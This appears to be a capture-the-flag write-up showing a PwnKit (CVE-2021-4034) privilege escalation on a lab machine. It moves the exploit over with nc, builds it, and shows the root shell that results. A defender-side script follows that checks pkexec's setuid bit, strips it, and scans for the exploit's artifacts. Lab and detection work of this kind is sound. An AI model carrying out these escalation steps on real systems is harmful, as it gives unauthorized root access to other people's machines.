CVE-2021-4034


PEAS flagged the target system as vulnerable to CVE-2021-4034.

The vulnerable program is part of Polkit, which manages process privileges. Polkit lets non-privileged processes communicate with privileged ones, and its pkexec utility lets authorized users run commands with elevated privileges, much like sudo.

A memory corruption flaw exists when pkexec is executed with no arguments (an empty argv). By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.

Exploit (pwnkit)


I found an exploit online

Exploitation


┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz 
 
www-data@THM-Chal:/dev/shm$ nc -nlvp 2222 >> CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 48882)

Delivery complete

www-data@THM-Chal:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@THM-Chal:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compiling

www-data@THM-Chal:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
THM-Chal
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::57:61ff:fe3f:5de9/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise
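Defender-side checks for the flaw described at the top of the page and for the build artifacts shown in the make output, written here as an added example (not part of this writeup or of the pwnkit exploit): whether pkexec is still setuid root, the interim mitigation from the Qualys advisory of dropping that bit until polkit is patched, and a scan of scratch directories for the `GCONV_PATH=.` directory and `gconv-modules` file the build leaves behind. It assumes pkexec lives at /usr/bin/pkexec unless a path is passed in.

```shell
#!/bin/sh
# Added defender-side check; not part of the writeup or of the pwnkit exploit.
# Assumption: pkexec lives at /usr/bin/pkexec unless a path is passed in.

# CVE-2021-4034 is only exploitable while pkexec is setuid root.
# Echoes setuid-root / not-setuid / missing; returns 0 only for setuid-root.
pkexec_setuid_state() {
    bin="${1:-/usr/bin/pkexec}"
    [ -e "$bin" ] || { echo missing; return 2; }
    if [ -n "$(find "$bin" -prune -user root -perm -4000 2>/dev/null)" ]; then
        echo setuid-root; return 0
    fi
    echo not-setuid; return 1
}

# Interim mitigation from the Qualys advisory: strip the setuid bit until the
# patched polkit package is installed (pkexec stops working, nothing else does).
harden_pkexec() {
    bin="${1:-/usr/bin/pkexec}"
    chmod 0755 "$bin" && [ ! -u "$bin" ]
}

# Post-exploitation scan. The exploit's make step creates a directory literally
# named "GCONV_PATH=." and a fake gconv-modules file in the attacker's working
# directory (/dev/shm in the writeup). glibc's real gconv-modules lives under
# /usr/lib or /usr/lib64, so either name inside a tmp directory is a strong
# indicator. Lists hits on stderr and echoes the total count on stdout.
count_pwnkit_artifacts() {
    total=0
    for d in "$@"; do
        [ -d "$d" ] || continue
        hits=$(find "$d" \( -name 'GCONV_PATH=.' -o -name 'gconv-modules' \) \
                    2>/dev/null || true)
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits" | sed 's/^/artifact: /' >&2
            total=$((total + $(printf '%s\n' "$hits" | wc -l)))
        fi
    done
    echo "$total"
}
```

After sourcing the file, `pkexec_setuid_state; count_pwnkit_artifacts /dev/shm /tmp /var/tmp` audits a live host; `harden_pkexec` needs root and is only meant as a stop-gap before the package update.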